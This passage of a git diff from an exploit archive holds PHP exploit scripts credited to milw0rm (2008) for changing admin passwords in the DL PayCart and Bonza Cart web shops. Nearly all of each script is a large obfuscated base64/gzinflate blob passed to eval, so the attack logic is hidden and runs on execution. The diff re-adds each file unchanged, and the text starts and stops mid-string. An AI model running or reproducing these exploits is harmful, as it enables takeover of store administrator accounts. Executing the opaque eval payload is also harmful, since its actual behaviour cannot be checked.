"W5Me3GSTowly/kZ9zCsO6smvPZY+6nMnRyZQr55w44nwnQHs0QRb6+Xin+iUAoY+6UQw9Pt0ij/o". - "JFHhZ53e5fhGJ60f8QcYm/BbAAbPqV85DZKDNs6pLNrjDjOf/LQOvPhoy9IlZjFwevOJ7DPYYoqF". - "0J11GHJ5zFqziGCkunH/sd9TSC9ZFtD3gX768y12L4T3E13KAmQ+YVZgg4/6VTM2VnDhUXi9Baxi". - "0vfvrr0+fK+kBpN52aAfDTJBrA3+yuKp3xd3kIPee6Zb7D3E4NVHoyz7iP4oB24/yhCzTha55YOd". 
- "TdcY7ljQFv3dvn3gQQ755EO1JP3rp/0rh8h7F2vqdlgP+epOdtAX/FdRRH+SQ4cxf48S7cJd30M+". - "vuZhC7pQ0tOFrp+8QL9Lzn4RrTd7xe8cqdkHDD9gQKWpGol+hT7PybCn1qO8Kn7ZLio1W6SBS3dY". - "KQ6qxJs72rDd/i5/lV/vdY9rb1skauYnyHWOMeScb+ZBfh1qSRezUA+3i2xXOazpWsfQ5Xh/fFdk". - "bMDuZQUY4aAuCBubtqJHXKlYy9DdXPTLuWQ/xxMKiPdS3aHOBp0w6e1ZPSO2VWUDetdZHsr8TwS1". - "GmKjh5pxAn2IvPU4p25Dxh5kH3QUF5mWfaUvl006tfH7WadYTrsNc27BZzQWBeRIlqldVifdOfee". - "zGX352g5laAibeH8JySi0xd+OqHyi7UlwSM6mqSG7WGPFd2+VmUTyavW2HIdElMPckERsfiy7gUH". - "ntt36KNstLRP+q5JApc7Oo7+jBSVgTp0WoPPLcbJQ2be6vmig/xL63nRGZkgh55aQi3ktIt+0qWv". - "dDqWgbcAuc41rmzIqXr39VzIRdWsnLjCE5LHtf6w1onj8nxC+YCr/0TMsUQi8AlRXUbMjAJ/Upoz". - "1EFYJ3XAYWufkYZ419jkiFnMau4Qi0eIj4b4n9zJBd/JMt1n7gAbAQs5PxswALhxTj6TtmHPZZ6i". - "xtEXPlEV4ETiNCdDz4+c3oJ8ow/4GnV6564qYAvLUh72Cx7yP9Qf42fECmWUJe+4v6v/3ra7G7+r". - "oyXVqLLTx9Ws1cQF1DS1J1iHz7QuFo/yyGX1Iq5IzFDkDunFaz73IDLgQJ4f0DV/E361xwcf6osP". - "WEBKmSLZagFXey3jIM8uphw322GXpkJ54Lws8RVScA9+u80bONiH3H/NmSgrnj/3DgLYz4LY4J4/". - "yal8vtMJhjv7JNvIVo2zK1elY1QNd5hPEeGwrtSgZdpBrIIN0jZyV8+3e8GeHu/58pHTepDn3f6I". - "0RJs8I7bMhC5kzbYZ5A/25TNT4/YIZ/tCCcltoHYKmPPKSHWT6A/sVFLOI2fc9nLrvks+x735B4P". - "8lOKFSv1maaZcDbkqg92YcHOTbBN0qBy2gAwc/Pptnz+qq9UiUw9xwcVLrGiH94xCLb/u370g42D". - "ymiAA9/LWK/7YZ0qbkd8QQ4Cu6s1weDLiH9yX37BrpFD7bwEe6eJlCKb5FRFsyxJnMGc6IWmwIZc". - "YnlpF8l8DRwDOMsqGWx8xePN1tx8vAsXIMbPwJ/Az1DHA6kDvAppzBos4XgI6oAP/gjc0Q9TH1CR". - "fPJ5zxnhWkn8zrWSEOJ3ygm3uvDA00i+Hv2aXDFNMLOR0Q/IUQXwkxO5446A561v81ZJCL4IiMzV". - "8B/Lk9bPH864r+//pCYRrE7/1/zfe4F90s1d/P+P7wvse7pxbafLBj8t6xP4A/J8l6wVAXKDlUJt". - "Pvq74+S/Q07+51jT4L/i8X5i+n9n9B9rdL7LfZ1Hhv9SCnW499xCPoWeEXjKlBsW2c03Kx76Yz2B". - "PAncQJ0hsUsgzukN5FHAlIvd8wlyKfBz0AF47SZbnKAWJRrwrAc83t4Tv4MaQO7q72K1Au54CcUE". 
- "YkWAXO80MdSO116YcD/24muW/Ifz11//BQ=="; - eval(base64_decode(gzinflate(base64_decode($G4N0K)))); - -?> - -# milw0rm.com [2008-12-07] +<?php +/* +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + DL PayCart <= 1.34 Admin Password Changing Exploit +============================================================================== + + [»] Script: [ DL PayCart ] + [»] Language: [ PHP ] + [»] homepage: [ http://www.dinkumsoft.net/ ] + [»] Type: [ Commercial ] + [»] found-report: [ 26.11.2008-02.12.2008 ] + [»] Founder.coder: [ G4N0K <mail.ganok[at]gmail.com> ] + +===[ LIVE ]=== + + [»] removed... + + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 <Tornado2800[at]gmail.com> + [»] B13 + [»] AFSHIN-ZARBAT <afshin.zarbat[at]yahoo.com> + [»] QU1E <evilinhell87[at]yahoo.com> + [»] Hussain-X <darkangel_g85[at]yahoo.com> + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... +*/ + +error_reporting(E_ALL); + $G4N0K = "vVlJm6LKEv1BvWGyShZ3ISiQFKCgjDsgq5iV1yiIv/5FAlpadav6vvv66wUfmuYQw4mIE2ngGoeo". + "X8w3yzNyVrS+NA9zZFsbk7YCe2UnoWIdI1EwHVvVt7aeoIxqNTq+mP28tSRrhaR0WIeWq5MuCnZc". + "SaeYKanQ5U++27Ua5axRtshgHypeHlqNxSzuZ6zez9q4iltHQu2rnFKR2501yrItkeeGM5erI1bU". + "NNobNZbLNqqkRqssKhDRDyLjJBcXuedTfKG+3F/fFbP1dtrzulZ20mDJGWJ+PgaelSI4HysL+CzR". + "oefzqDDaaG+V0d48OkrZBVuU+Ax/wrJzwksqgzeHRf6AZbpZ90IeylIfMw61cRzbyigO9G03CfWy". 
+ "USyQ/VxuCktHkpC+2kYa781ks6QSfctdDFEQApmuo0wwfc+4YIbvA1FYwn6ngClPQS9Ir4rQRGBP". + "pHSJdbHW+qqZa+y073CGQb265xIp1iyWbR6B3K+K2fqscUE56FipbaCUz6C3GlSgg0hXvgtnKsWT". + "I0uHiKFTTVxkO8XJQxdsscK9784K0LlBoqpj16gDeZXYDPi1F5yoKvOIsUqUdYlTOX0AsvrbLjE9". + "tQZ/N2iVlpESlOCznIzHwzr6EsDvQd4YYlJmvmv8DFi1xXCO5oKtZb5fZ8bSpMij38t6Cb26XOdp". + "h5ewdk/BeupladZV6DpNoBglVsY9I1YtAg89xQzfhK6Z6J7AIdFYAaIApTbsWfMP60ShCVxcRpWZ". + "vHbUi+gGLfE3Zpw6YFJqDXaLZJPIMp5bBXXgngviZ6Q4jSYKD3uF3qMc+rJJIlfqiR/X+eIZKUIa". + "yFYdVfH4m1xeiH5YKZtgV58iZlauQY43k3oJqrKMZAtsZpJ5gz185lz6sK9f8VS4HM6CMw1K80b/". + "r6sZxIg9zI1lqQhkwM/lcNYVgbvu+0H/OtoL9GS/CnyQ4mUNNgmov5dDykD/YX/MlAWWkyd9Z3ax". + "kkz+Ore+Zz5FslPhUT4q8FJKcyXwBz6t9+poV2Jr72aLY1yV+1Axn3T2XU6IcwYpxwecrPf4EHpW". + "uQa8xhWuo7xOsWe1a0aFOLfKOD/kRu4z5EFLqXsVhUvEnOtgeWQB12CzA6svhe51eeRJDtDY0W5D". + "DEEsB65UDJ9lEi/FkCfAhgySjYbE5marFjhD7+NT3MH4o56VUZLcEedNtsnPXVzZZA2/2VF/4jHE". + "bJEg8atHeLt+9vrPY8MjzR/G3+d9eBbUy9fnLBKtF+LhM+Stt2nsTRTmd3NaJHXv43fzPj5gv290". + "moOM41nv+4/73cnyNp5Fxs9vH+S4f76zH8jLv41njft49HzUbxifZKH58SxyvjT+/p39tjaXOKtU". + "QquZsLPtZEf5iUbP28H2Eh+P58D+7HQOfAY7tV5P/CTEHj2MT3r9G/v91ucX+PuND9jvD8UU/yv7". + "Df7pp9i5xs/wnmLrhg/yXXj7MqZ+ab8RX2O8nCeMw2epu2K/Jed6Uyxo/aL9zn7f5In5PX7fBoxP". + "WJbOU6wK728xhhj7Wu5v7adc8Tvie7AnO+7r3XLDFLMwR8umvPJP7LdyuFg+tyHUL3NfENmv8TPo". + "SM65vj0iwxBP/BvRhcg0xJ/47/Lf73z+aP34DVz1j8qbd22sqOUG3qQukxq+lSxjRzhIZsk7WjU2". + "26G/ka3CJ5y/AI6f+C5wA4bj0bVeX2t7xffRVph4GXD9iesYO3vgOigTUh/4d0TW7pvCow3JLgN4". + "mr29Sk3yfbfy955HZUimgQenbQA9QyzzwPfIGTXYzzog6CHW0CfEjNGHnkBphBftzu/8jPQnSTEH". + "PrUPgP8Al8g2WXDy90a3puwE+E2H5C6JeqFGillFlXqJl9AbMOgH8Jkrt/0BfKaHvEF0UzfAW2Gf". + "Jtxx85HPdQnRFzgMDTzszaJmGspnKAJutAZ7TnPGtcAnY4Vw3xvvuXHdB74lLgYWtmZxHSjWYZ2v". + "2IGD9igBXg42c/rQ4ZVd0YB9Zmnk2o9jj30MfA/SSHHgPJRtBpmKSZ5zTXTxXbWEPrCKWARrhDbe". + "W5Me3GSTowly/kZ9zCsO6smvPZY+6nMnRyZQr55w44nwnQHs0QRb6+Xin+iUAoY+6UQw9Pt0ij/o". + "JFHhZ53e5fhGJ60f8QcYm/BbAAbPqV85DZKDNs6pLNrjDjOf/LQOvPhoy9IlZjFwevOJ7DPYYoqF". 
+ "0J11GHJ5zFqziGCkunH/sd9TSC9ZFtD3gX768y12L4T3E13KAmQ+YVZgg4/6VTM2VnDhUXi9Baxi". + "0vfvrr0+fK+kBpN52aAfDTJBrA3+yuKp3xd3kIPee6Zb7D3E4NVHoyz7iP4oB24/yhCzTha55YOd". + "TdcY7ljQFv3dvn3gQQ755EO1JP3rp/0rh8h7F2vqdlgP+epOdtAX/FdRRH+SQ4cxf48S7cJd30M+". + "vuZhC7pQ0tOFrp+8QL9Lzn4RrTd7xe8cqdkHDD9gQKWpGol+hT7PybCn1qO8Kn7ZLio1W6SBS3dY". + "KQ6qxJs72rDd/i5/lV/vdY9rb1skauYnyHWOMeScb+ZBfh1qSRezUA+3i2xXOazpWsfQ5Xh/fFdk". + "bMDuZQUY4aAuCBubtqJHXKlYy9DdXPTLuWQ/xxMKiPdS3aHOBp0w6e1ZPSO2VWUDetdZHsr8TwS1". + "GmKjh5pxAn2IvPU4p25Dxh5kH3QUF5mWfaUvl006tfH7WadYTrsNc27BZzQWBeRIlqldVifdOfee". + "zGX352g5laAibeH8JySi0xd+OqHyi7UlwSM6mqSG7WGPFd2+VmUTyavW2HIdElMPckERsfiy7gUH". + "ntt36KNstLRP+q5JApc7Oo7+jBSVgTp0WoPPLcbJQ2be6vmig/xL63nRGZkgh55aQi3ktIt+0qWv". + "dDqWgbcAuc41rmzIqXr39VzIRdWsnLjCE5LHtf6w1onj8nxC+YCr/0TMsUQi8AlRXUbMjAJ/Upoz". + "1EFYJ3XAYWufkYZ419jkiFnMau4Qi0eIj4b4n9zJBd/JMt1n7gAbAQs5PxswALhxTj6TtmHPZZ6i". + "xtEXPlEV4ETiNCdDz4+c3oJ8ow/4GnV6564qYAvLUh72Cx7yP9Qf42fECmWUJe+4v6v/3ra7G7+r". + "oyXVqLLTx9Ws1cQF1DS1J1iHz7QuFo/yyGX1Iq5IzFDkDunFaz73IDLgQJ4f0DV/E361xwcf6osP". + "WEBKmSLZagFXey3jIM8uphw322GXpkJ54Lws8RVScA9+u80bONiH3H/NmSgrnj/3DgLYz4LY4J4/". + "yal8vtMJhjv7JNvIVo2zK1elY1QNd5hPEeGwrtSgZdpBrIIN0jZyV8+3e8GeHu/58pHTepDn3f6I". + "0RJs8I7bMhC5kzbYZ5A/25TNT4/YIZ/tCCcltoHYKmPPKSHWT6A/sVFLOI2fc9nLrvks+x735B4P". + "8lOKFSv1maaZcDbkqg92YcHOTbBN0qBy2gAwc/Pptnz+qq9UiUw9xwcVLrGiH94xCLb/u370g42D". + "ymiAA9/LWK/7YZ0qbkd8QQ4Cu6s1weDLiH9yX37BrpFD7bwEe6eJlCKb5FRFsyxJnMGc6IWmwIZc". + "YnlpF8l8DRwDOMsqGWx8xePN1tx8vAsXIMbPwJ/Az1DHA6kDvAppzBos4XgI6oAP/gjc0Q9TH1CR". + "fPJ5zxnhWkn8zrWSEOJ3ygm3uvDA00i+Hv2aXDFNMLOR0Q/IUQXwkxO5446A561v81ZJCL4IiMzV". + "8B/Lk9bPH864r+//pCYRrE7/1/zfe4F90s1d/P+P7wvse7pxbafLBj8t6xP4A/J8l6wVAXKDlUJt". + "Pvq74+S/Q07+51jT4L/i8X5i+n9n9B9rdL7LfZ1Hhv9SCnW499xCPoWeEXjKlBsW2c03Kx76Yz2B". + "PAncQJ0hsUsgzukN5FHAlIvd8wlyKfBz0AF47SZbnKAWJRrwrAc83t4Tv4MaQO7q72K1Au54CcUE". 
+ "YkWAXO80MdSO116YcD/24muW/Ifz11//BQ=="; + eval(base64_decode(gzinflate(base64_decode($G4N0K)))); + +?> + +# milw0rm.com [2008-12-07] diff --git a/platforms/php/webapps/7366.php b/platforms/php/webapps/7366.php index 1c54268a5..ec560ab90 100755 --- a/platforms/php/webapps/7366.php +++ b/platforms/php/webapps/7366.php 
@@ -1,105 +1,105 @@ -<?php -/* -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - Bonza Cart <= 1.10 Admin Password Changing Exploit -============================================================================== - - [»] Script: [ Bonza Cart ] - [»] Language: [ PHP ] - [»] homepage: [ http://www.dinkumsoft.net/ ] - [»] Type: [ Commercial ] - [»] found-report: [ 26.11.2008-02.12.2008 ] - [»] Founder.coder: [ G4N0K <mail.ganok[at]gmail.com> ] - -===[ LIVE ]=== - - [»] removed... - - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 <Tornado2800[at]gmail.com> - [»] B13 - [»] AFSHIN-ZARBAT <afshin.zarbat[at]yahoo.com> - [»] QU1E <evilinhell87[at]yahoo.com> - [»] Hussain-X <darkangel_g85[at]yahoo.com> - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... -*/ - -error_reporting(E_ALL); - $G4N0K = "vVlZd6rKEv5B+4VBE3kUFGiCKChTv0mTMCt3owz++lsNGDU5yT7rrKz9wEKaprrqq6G/arFrHINu". - "PtssWuQs2dXCPM6QbW1M1sL20o72qnUKJNF0bG21tVcRSphaZ8nF7Ga1JVtLJMf9d2ixPK8k0SaF". - "fCZczuxd4ey7Ta0zzhol8wTkMGRxrHU+5MNuyq+6aU0KUjsyql+VmAncptUZy7YkYdKvuVieQlWL". - "g4NRhkpeB4Vc6YXFYAn9ojqOek0Ctz2TC/Ol/NUum663o8zrt4oT48XEkNL2hD0rRrB+qM7ht8zu". - "PV9AmVEHBysPDubJUfMGb1Hkc8I5VJxzuGASuE9CSTiGClutOzHdK3JHOIfZOI5tJcwE7K03EfOy". - "US3Qvc03mQbyyhgtjZgczGizYKLVdtICXiJW2DJIRNP3jEvICR2WxAXIO2MuP+NOlF9VsQoAT6Q2". - "kXWx1qtlNdP5UW6/hsG8um2OVGtKFFtAoPeratY+b1xQCjYWWo3V/Bns1nABNkhs4buwppo9OYp8". 
- "DDg21qV5slOddO8CFsuw891pBjZXSNJWoWuUWFlGNgd+7UQnKPI04KwcJU3kFE6HQVd/20Smp5Xg". - "7wot4zxQcQ4+S+k46b9jLxje47QypChPfNf4jXmtDmEd3QWsFaFbJ8bCZOi1utf1svfKfJ3GTbiA". - "bw8MfM+8LMyy2LtOhVUjD9VBZsBrGfbQE+GEau+a0coTJ0gylhBREKU2yCyFh+8kscJumAeFGb02". - "zIvk4pr6O+ScEnMxswbcAsWkugzrFrjEbptRPyPVqXRJfJC19x71WC2qKHDljvpxnc6fkSrGWLHK". - "oCDDOyW/UPtCNa/wrjwH3DRfgx5vJvOCizwPFAswM+m8Hg+fa3Mf5PqFwOwX/VqwpsHo3uD/dTGF". - "HLH7uUSRM6xA/FyO7UoVJ1e5H+wvg4PIjvgV4IM4XJSACWb+WQ85Aft7+SGXZ6ESPa12ZkPUaPRX". - "W/ue+RQoThEO+jHYixndlcEf4Xl90AZcKdbeOxYnUuSHvWo+rfibnpDnHFJPD3GyPoTHvWfla4hX". - "UoRlkJZx6Fn1mtMgz62cpMfUSH2OXmghN6+SeAm4tsSLEw9xDZgd+dVCbF4XJ4HWAJ0fcOtzCHIZ". - "u3LW/1ZovmR9nQAMOaQYFc3NzVbLwgTdxse8g/FHOwsjp7WDpFWySduGFDb9RtjsmL9xGVIyj5D0". - "1SW+XX973eex/pJnD+O3eR+uOfPy9TrzSO9E0v+GuvU2jr1J4uxuTo3k5jZ+N+/jBfh9Y9MMdBzW". - "uskf5N3p8jasRcfbtw963F/f4Qf6Cm/DWoMcj50N9vXjoy6sMKxF15eH99/ht7UnkbOMZbScijvb". - "jnaMH+nsrO6xlwUyrAPy+XEd+A041V5H/SQSj+3HR7v+C34/ev0h/n7wAvz+Uk4Jf8Kv90835s41". - "f/r7mFvv8UGfxbcvc+qP+A3xNeRLO8Y4/Jaba+zXdF1vzAW9m9ff4fdNnZjdx+9bH+NjLMvtmKvi". - "7S4RyLGv9f4WP/Uav0N893jyg1zvvTaMOQtz9GSsK/8Gv6UzIUpb72H/Mg8Z1f2aP72NdJ3r3aM6". - "9PkkvFFbqE59/kn/rf795PVX948f4Kp/Vd+0qYmq5Ru4032Z7uFb2TJ2lIMklrJjNWOz7fsbxcp8". - "yvkz4PiR7wI34CYCuu7X1729ELpgK468DLj+yHWMnd1zHZSIsQ/8O6DfHqrMYw3ZzjFc1cFexiZ9". - "3i39g+cxCVJY4MFxjaFnIIoAfI+uUQJ+1hFBD7GGPoFwRrf3REanvGjX3vgZ7U+ibAZ86oCB/wCX". - "SDYJPvsHo1kzdgT8pkFKEwWdWCLVLIJCu5AF9AYc+gV85sptfwGf6aBuUNu0DfBWkFPtd5PZwOea". - "iNoLHIYFHvZmMVMdpVMUADdaA57jnOFb4JNEpdz3nfe8c90HviXNexa25sMSq9ZxnS75noN2KAJe". - "Dpg53d4R1F1WAT7TOHDtx7HHPgaecRyoDqyHkk2vUzbq05bUFt/VcugDi4BH8I1Yk4M12jEZMTmZ". - "oOcP2mNe46Ac/dqF8kd77vRIRObVE995IjxzEHssja31Yv5vbIohhj7ZRGPo52wiH2ySmf1nm256". - "fGOT3g3xBzE2xm8GMdjGfuFUSME1SZkkOIRNyH3y0xp75GQr8oXwIXB684nK6bEYc2HvTpsQajnh". - "rWlAY6R45/5Dv6fSXjLPoO8D+1bP77l7obyf2pJnoPM55EUef7SvmPJEDTOPCddbiNWQ9v27a68P". - "z4VchXRe0tvHgk6Qa72/EjL2+9IOatCtZ3rPvYccvPpo0OUQsB/1COuPOhDeSQI3f8DZdI3+jAVt". 
- "0T/J7bAHNeSTD7Wc9q+f5BcO1fcu17Rt/z3UqzvdwV7wX8FQ+2kN7cf8A4r0y+R67+vxtQ5b0IXS". - "nm7v+tEL9Lt07RfJerOXws6RqwPmhD4GNJYpkeQX6POcJPS0ctBXC1+280JL5jF22SZUs6MmC+aO". - "NWy3u6tf+dey7uPa22aRlvgRcp0TgZrzzTyor1VGIKcQ7IUoF+NXR4yDBXvy3bzSi7Lec858Xwi/". - "8Xb6vz1nF1tPPO9cIQNsOy1roc89wd44F4wOw/4YnrCnpfsF02rZNA8ZOQPfnjfucO/HWDEm/KqF". - "mne+s/Ehbr3tJLmb2/1x7gHkOU6DwTa8tbuVTM9OaA8eXlBaZT4Xw35hHAOuijb9/qfBHjI5air8". - "lrJnTaF22vBunvQ4SfNET77CbAK9u3Xau5Ma7m/UDyE9j+BXZ6LEzYZra/A9G0oicmTL1C/L88pp". - "O08Z957kUfZ9DOiJRkjenh2IT5KwIubomdwxAryf9i7Uzu2M1dN59CKHYJtVh/zqGck2XO/P0S43". - "IwM4zboT8yBhHftSReTgPwHPmb5sRRW7xu+gm3WrxXyyWtjdejfn0BKXkCdQk6N61U0aT9VIkJ1y". - "7M1PJnCJsLChxq6aldzbsQi46RmPObpOxN/YdZr+jMDD+fDthzPG3THyPbEJ6LmZ1/OL+lVi+ZAn". - "p4GTsBDjLfUR5JeTfZSxUxzAF2r5gF26h2fwab3vJkk/N6d6TZJ1Z/0v4E45koC/SFZDePOMbu+g". - "bqx6H/cx4VkMPYOhcY8PRu1zp5qA3K/yU3/Iodu+6G0b2IO0LihmFayZk4MG8YUqtLCbl92pxEkU". - "axA/oSKn+y5/xv2ZdJTc6if6FXJxDPESkwK4j7uMsCLQ86OznkxitBhrcG6wAeyLsE8ckBpSXKKQ". - "Bz77Pq+p/XTysWZBXbPKMJ0koAvYbwHOk+c31wEMZ0c08sXrnuNJWgG+Zeh5GynYOJDmE6LCOuNZ". - "6pq/nW0NZ2FHtuc/bJNs8uq3B1zUT2/xgV2T6kZ1qSkXgHfBC8tE1GYbYrs/x+vEjp5NY3rel0zO". - "FJdBb/QLJdkzPoQdPRsDv8SQ07HPVdWYryXs8YBHC+/kArtCcTenfPGgrkHt11O2gDxiSBe9+xyw". - "EHBhVJCP93LLNZcXSIppfSgBkw7e0ZihZ8WX0DVS0PGCD04VqFnysr36cp643SmkNt16MisHHvLB". - "JzfbN0p/HkvP3SvKgwD3DrsWAX7a3PUf6dB/OFmPiyT0fKo/O158lrkrHJ6ewxLe4CkvonsEgtqB". - "kgnweHFjs1bwyANovUEDzu8xBj7cUS5O/dz3Q43vToGjHK/z6P8JoKtPdT4Cbs06mdUPa9zxXaiV". - "d+N3HCtnzqgY9gSdxk4i/oysC+C9+5wD//ZOIL7B5rE/Ygkqej89BbRGQX1Di7iBPIUYiuvAXT6P". - "/ntC9Gz/cqL+u/2nsdSmaEmYXSrqo/8usI+c3znV+33kFAl6fttCzYb+CPbk6HNsCdALriIdembC". - "g2wJ+vtFy24gV0EnN3TbM9Qh4KLAjYHDbZL5GepgpAOnGGLnm3VdXIWecXyBvRCpUA/d9oK34jP0". 
- "cbRORNoSb+yMeabn1/8H"; - eval(base64_decode(gzinflate(base64_decode($G4N0K)))); -?> - -# milw0rm.com [2008-12-07] +<?php +/* +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + Bonza Cart <= 1.10 Admin Password Changing Exploit +============================================================================== + + [»] Script: [ Bonza Cart ] + [»] Language: [ PHP ] + [»] homepage: [ http://www.dinkumsoft.net/ ] + [»] Type: [ Commercial ] + [»] found-report: [ 26.11.2008-02.12.2008 ] + [»] Founder.coder: [ G4N0K <mail.ganok[at]gmail.com> ] + +===[ LIVE ]=== + + [»] removed... + + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 <Tornado2800[at]gmail.com> + [»] B13 + [»] AFSHIN-ZARBAT <afshin.zarbat[at]yahoo.com> + [»] QU1E <evilinhell87[at]yahoo.com> + [»] Hussain-X <darkangel_g85[at]yahoo.com> + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... +*/ + +error_reporting(E_ALL); + $G4N0K = "vVlZd6rKEv5B+4VBE3kUFGiCKChTv0mTMCt3owz++lsNGDU5yT7rrKz9wEKaprrqq6G/arFrHINu". + "PtssWuQs2dXCPM6QbW1M1sL20o72qnUKJNF0bG21tVcRSphaZ8nF7Ga1JVtLJMf9d2ixPK8k0SaF". + "fCZczuxd4ey7Ta0zzhol8wTkMGRxrHU+5MNuyq+6aU0KUjsyql+VmAncptUZy7YkYdKvuVieQlWL". + "g4NRhkpeB4Vc6YXFYAn9ojqOek0Ctz2TC/Ol/NUum663o8zrt4oT48XEkNL2hD0rRrB+qM7ht8zu". + "PV9AmVEHBysPDubJUfMGb1Hkc8I5VJxzuGASuE9CSTiGClutOzHdK3JHOIfZOI5tJcwE7K03EfOy". + "US3Qvc03mQbyyhgtjZgczGizYKLVdtICXiJW2DJIRNP3jEvICR2WxAXIO2MuP+NOlF9VsQoAT6Q2". 
+ "kXWx1qtlNdP5UW6/hsG8um2OVGtKFFtAoPeratY+b1xQCjYWWo3V/Bns1nABNkhs4buwppo9OYp8". + "DDg21qV5slOddO8CFsuw891pBjZXSNJWoWuUWFlGNgd+7UQnKPI04KwcJU3kFE6HQVd/20Smp5Xg". + "7wot4zxQcQ4+S+k46b9jLxje47QypChPfNf4jXmtDmEd3QWsFaFbJ8bCZOi1utf1svfKfJ3GTbiA". + "bw8MfM+8LMyy2LtOhVUjD9VBZsBrGfbQE+GEau+a0coTJ0gylhBREKU2yCyFh+8kscJumAeFGb02". + "zIvk4pr6O+ScEnMxswbcAsWkugzrFrjEbptRPyPVqXRJfJC19x71WC2qKHDljvpxnc6fkSrGWLHK". + "oCDDOyW/UPtCNa/wrjwH3DRfgx5vJvOCizwPFAswM+m8Hg+fa3Mf5PqFwOwX/VqwpsHo3uD/dTGF". + "HLH7uUSRM6xA/FyO7UoVJ1e5H+wvg4PIjvgV4IM4XJSACWb+WQ85Aft7+SGXZ6ESPa12ZkPUaPRX". + "W/ue+RQoThEO+jHYixndlcEf4Xl90AZcKdbeOxYnUuSHvWo+rfibnpDnHFJPD3GyPoTHvWfla4hX". + "UoRlkJZx6Fn1mtMgz62cpMfUSH2OXmghN6+SeAm4tsSLEw9xDZgd+dVCbF4XJ4HWAJ0fcOtzCHIZ". + "u3LW/1ZovmR9nQAMOaQYFc3NzVbLwgTdxse8g/FHOwsjp7WDpFWySduGFDb9RtjsmL9xGVIyj5D0". + "1SW+XX973eex/pJnD+O3eR+uOfPy9TrzSO9E0v+GuvU2jr1J4uxuTo3k5jZ+N+/jBfh9Y9MMdBzW". + "uskf5N3p8jasRcfbtw963F/f4Qf6Cm/DWoMcj50N9vXjoy6sMKxF15eH99/ht7UnkbOMZbScijvb". + "jnaMH+nsrO6xlwUyrAPy+XEd+A041V5H/SQSj+3HR7v+C34/ev0h/n7wAvz+Uk4Jf8Kv90835s41". + "f/r7mFvv8UGfxbcvc+qP+A3xNeRLO8Y4/Jaba+zXdF1vzAW9m9ff4fdNnZjdx+9bH+NjLMvtmKvi". + "7S4RyLGv9f4WP/Uav0N893jyg1zvvTaMOQtz9GSsK/8Gv6UzIUpb72H/Mg8Z1f2aP72NdJ3r3aM6". + "9PkkvFFbqE59/kn/rf795PVX948f4Kp/Vd+0qYmq5Ru4032Z7uFb2TJ2lIMklrJjNWOz7fsbxcp8". + "yvkz4PiR7wI34CYCuu7X1729ELpgK468DLj+yHWMnd1zHZSIsQ/8O6DfHqrMYw3ZzjFc1cFexiZ9". + "3i39g+cxCVJY4MFxjaFnIIoAfI+uUQJ+1hFBD7GGPoFwRrf3REanvGjX3vgZ7U+ibAZ86oCB/wCX". + "SDYJPvsHo1kzdgT8pkFKEwWdWCLVLIJCu5AF9AYc+gV85sptfwGf6aBuUNu0DfBWkFPtd5PZwOea". + "iNoLHIYFHvZmMVMdpVMUADdaA57jnOFb4JNEpdz3nfe8c90HviXNexa25sMSq9ZxnS75noN2KAJe". + "Dpg53d4R1F1WAT7TOHDtx7HHPgaecRyoDqyHkk2vUzbq05bUFt/VcugDi4BH8I1Yk4M12jEZMTmZ". + "oOcP2mNe46Ac/dqF8kd77vRIRObVE995IjxzEHssja31Yv5vbIohhj7ZRGPo52wiH2ySmf1nm256". + "fGOT3g3xBzE2xm8GMdjGfuFUSME1SZkkOIRNyH3y0xp75GQr8oXwIXB684nK6bEYc2HvTpsQajnh". + "rWlAY6R45/5Dv6fSXjLPoO8D+1bP77l7obyf2pJnoPM55EUef7SvmPJEDTOPCddbiNWQ9v27a68P". 
+ "z4VchXRe0tvHgk6Qa72/EjL2+9IOatCtZ3rPvYccvPpo0OUQsB/1COuPOhDeSQI3f8DZdI3+jAVt". + "0T/J7bAHNeSTD7Wc9q+f5BcO1fcu17Rt/z3UqzvdwV7wX8FQ+2kN7cf8A4r0y+R67+vxtQ5b0IXS". + "nm7v+tEL9Lt07RfJerOXws6RqwPmhD4GNJYpkeQX6POcJPS0ctBXC1+280JL5jF22SZUs6MmC+aO". + "NWy3u6tf+dey7uPa22aRlvgRcp0TgZrzzTyor1VGIKcQ7IUoF+NXR4yDBXvy3bzSi7Lec858Xwi/". + "8Xb6vz1nF1tPPO9cIQNsOy1roc89wd44F4wOw/4YnrCnpfsF02rZNA8ZOQPfnjfucO/HWDEm/KqF". + "mne+s/Ehbr3tJLmb2/1x7gHkOU6DwTa8tbuVTM9OaA8eXlBaZT4Xw35hHAOuijb9/qfBHjI5air8". + "lrJnTaF22vBunvQ4SfNET77CbAK9u3Xau5Ma7m/UDyE9j+BXZ6LEzYZra/A9G0oicmTL1C/L88pp". + 